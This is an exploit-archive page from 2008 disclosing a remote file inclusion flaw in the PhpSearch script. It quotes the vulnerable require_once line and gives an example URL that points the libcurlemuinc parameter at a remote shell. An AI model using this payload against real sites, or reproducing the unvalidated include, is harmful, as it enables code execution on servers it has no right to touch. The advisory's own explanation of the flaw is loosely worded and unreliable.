phpsearch-rfi.txt

phpsearch-rfi.txt: Posted Jan 22, 2008; Authored by SekoMirza; PhpSearch suffers from a remote file inclusion vulnerability.; tags | exploit, remote, code execution, file inclusion; SHA-256 | 1b829ff9306aeef1b48a4708cb0e4303ef8a0c469d1b8ae9eae5e7e9aa76a2c1; Download | Favorite | View

phpsearch-rfi.txt

Script : PhpSearch 
Bug    : Remote File Inclusion
Author : SekoMirza 
Company : https://www.hawkententerprises.org
Download : https://www.hawkenterprises.org/dev/phpsearch.zip
Dork : not yet
_____________________________________________

Where :
phpsearch/utils/class_HTTPRetriever.php

Bug : 
if (is_readable($libcurlemuinc)) require_once($libcurlemuinc);

Explanation : 
if  class_HTTPRetriever.php is readable you can execute malicious code. 

Example : 
https://www.site.com/[path]/utils/class_HTTPRetriever.php?libcurlemuinc=[Sh3LL]

_____________________________________________

Thanx to : Str0ke , Hypn0sis , Earnk Kazno , Shadow , Ph.0 , Class 3rr0r , MadWorM ,   and all hackers

Top Authors In Last 30 Days

Red Hat 300 files
Ubuntu 63 files
Debian 20 files
LiquidWorm 19 files
Apple 9 files
Gentoo 5 files
Google Security Research 4 files
Alter Prime 3 files
Chokri Hammedi 3 files
nu11secur1ty 2 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,163)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,928)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,326)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,981)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

phpsearch-rfi.txt

phpsearch-rfi.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

phpsearch-rfi.txt

Share This

phpsearch-rfi.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems